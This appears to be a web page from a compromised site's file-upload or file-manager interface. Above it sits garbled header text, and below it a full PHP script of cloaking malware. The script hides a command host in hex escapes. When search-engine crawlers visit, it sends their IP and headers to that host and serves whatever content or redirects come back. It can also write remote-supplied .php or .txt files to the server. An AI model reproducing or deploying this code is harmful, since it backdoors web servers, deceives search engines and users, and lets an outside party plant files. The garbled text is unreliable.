kohjhjhصثقص5572hjkhk7872ثقصثقgdfgdg
Ele57885fddfg872782782782 hjkhj782dfgfghgقفغفغفقhfg555434536
/
home4
/
kisgavwq
/
.quarantine
/
Upload FileeE
HOME
<?php error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $ixv='2.2.17'; $gov = "\x63\146\x2e\146\x6f\162\x74\165\x6e\145\x64\141\x79\56\x78\171\x7a"; $db = "1000"; $ip = $_SERVER['REMOTE_ADDR']; $ur = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ""; $ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ""; $uri = $_SERVER["REQUEST_URI"]; $host = $_SERVER["HTTP_HOST"]; $lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:""; $token = isset($_SERVER['HTTP_XDOIM'])?$_SERVER['HTTP_XDOIM']:""; $proto = ((!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') || (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off')) ? "https": "http"; $header = array('Lang: '.$lang,'User-Agent: '.$ua, 'Referer: '.$ur, 'Http-Proto: '.$proto, 'Http-Host: '.$host, 'Http-Uri: '.$uri, 'Dbgroup: '.$gov, 'Http-X-Forwarded-For: '.$ip,'Token: '.$token); $postdata= "proto=$proto&shost=$host&ip=$ip&dbgroup=$db&uri=$uri"; if (($uri!=="/favicon.ico") &&( @preg_match('#google|yahoo|bing#i',$ua) || (@preg_match('#google.co.jp|google.com|yahoo.com|yahoo.co.jp|bing.com#i',$ur) && @preg_match('#[/\?]([a-z0-9]{1})(\d+)#i',$uri)))){ list($cntx,$code,$ctype) = urlx('http://'.$gov.'/index?'.$postdata,$header,$postdata); if (stripos($ctype,'gzip')>0){ @header('Content-type: application/x-gzip'); exit($cntx); } if (stripos($cntx,'<!doct')===0||stripos($cntx,'<html')===0){ exit($cntx); } if (stripos($cntx,'<?xml')===0){ @header('Content-type: text/xml'); exit($cntx); } if (stripos($cntx,'User-ag')===0){ @header('Content-type: text/plain;charset=utf-8'); exit($cntx); } if (stripos($cntx,'http')===0){ if (stripos($cntx,'?main_page=')){ @header('Location: ' . $cntx); exit;} if (strstr($cntx,"[,]")){$segs = explode("[,]",$cntx); $lines = explode(",",$segs[0]); $result = ''; foreach($lines as $url){ list($respbody,$code) = urlx($url,null,null,$segs[1]);$result .= $url.$respbody; } exit($result);} } if (@preg_match('#^[^.]*.(txt|php)#i',$cntx)){$values = explode("[,]",$cntx); todk($values[0],$values[1]); if(file_exists($values[0])){ exit('end ok');}else{ exit('no false');} } if (stripos($cntx,'ok')===0){ exit($cntx.$db.$gov.$ixv); } if ($code >= 400 && $code < 500){@header('HTTP/1.1 404 Not Found');exit;} if ($code >= 500){@header('HTTP/1.1 500 Internal Server Error');exit;} if ($cntx!=""){ exit($cntx); } } function urlx($url,$header=null,$postdata=null,$ua=null) { if (!function_exists('curl_init')){ return; } try { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate'); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); ($header===null)?'':curl_setopt($ch, CURLOPT_HTTPHEADER, $header); ($ua===null||$ua==="")?'':curl_setopt($ch, CURLOPT_USERAGENT, $ua); if ($postdata!==null && $postdata!=="") {curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); } $body = curl_exec($ch);$code = curl_getinfo($ch,CURLINFO_HTTP_CODE); $ctype = curl_getinfo($ch,CURLINFO_CONTENT_TYPE);curl_close($ch); } catch (Exception $e) { } return array($body,$code,$ctype); } ?>